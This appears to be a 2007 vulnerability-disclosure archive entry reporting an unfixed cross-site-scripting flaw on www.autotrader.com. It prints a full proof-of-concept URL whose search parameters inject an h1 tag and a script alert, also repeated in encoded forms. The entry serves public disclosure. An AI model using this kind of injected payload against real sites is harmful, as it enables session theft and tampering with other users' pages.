Security researcher ap101, has submitted on 16/10/2007 a cross-site-scripting (XSS) vulnerability affecting www.autotrader.com, which at the time of submission ranked 1021 on the web according to Alexa. 
We manually validated and published a mirror of this vulnerability on 17/10/2007. It is currently unfixed. 
If you believe that this security issue has been corrected, please send us an e-mail. | 
 
              | Date submitted: 16/10/2007 | 
Date published: 17/10/2007 | 
Fixed? Mail us! | Status:   UNFIXED |  
 
| Author: ap101 | 
Domain: www.autotrader.com | 
Category: XSS | 
Pagerank: 1021 | 
 
 
 
URL: http://www.autotrader.com/fyc/no_cars_found.jsp?num_records=25&search_lang=&page_location=findacar%3 A%3Aispsearchform&search_type=both&distance=25&address=80004&marketZipError=false&style_flag=1&make= ALFA&model=&make2=&start_year=1981&end_year=2008&min_price=&max_price=&transmission=&engine=&drive=& doors=&fuel=&max_mileage=&color=&keywords_display=%3Ch1%3Eap101%3C%2Fh1%3E%3Cscript%3Ealert%28%22ap1 01%22%29%3C%2Fscript%3E&sort_type=priceDESC&body_code=0&certified=&advanced=y&default_sort=priceDESC &awsp=false&keywordsrep=0601040490620971120490480490600471040490620601150991141051121160620971081011 14116040034097112049048049034041060047115099114105112116062&keywordsfyc=__PGgxPmFwMTAxPC9oMT48c2NyaX B0PmFsZXJ0KCJhcDEwMSIpPC9zY3JpcHQ___ | 
 
| 
Click here to view the mirror
 | 
 
| 
 | 
 
 
         
 |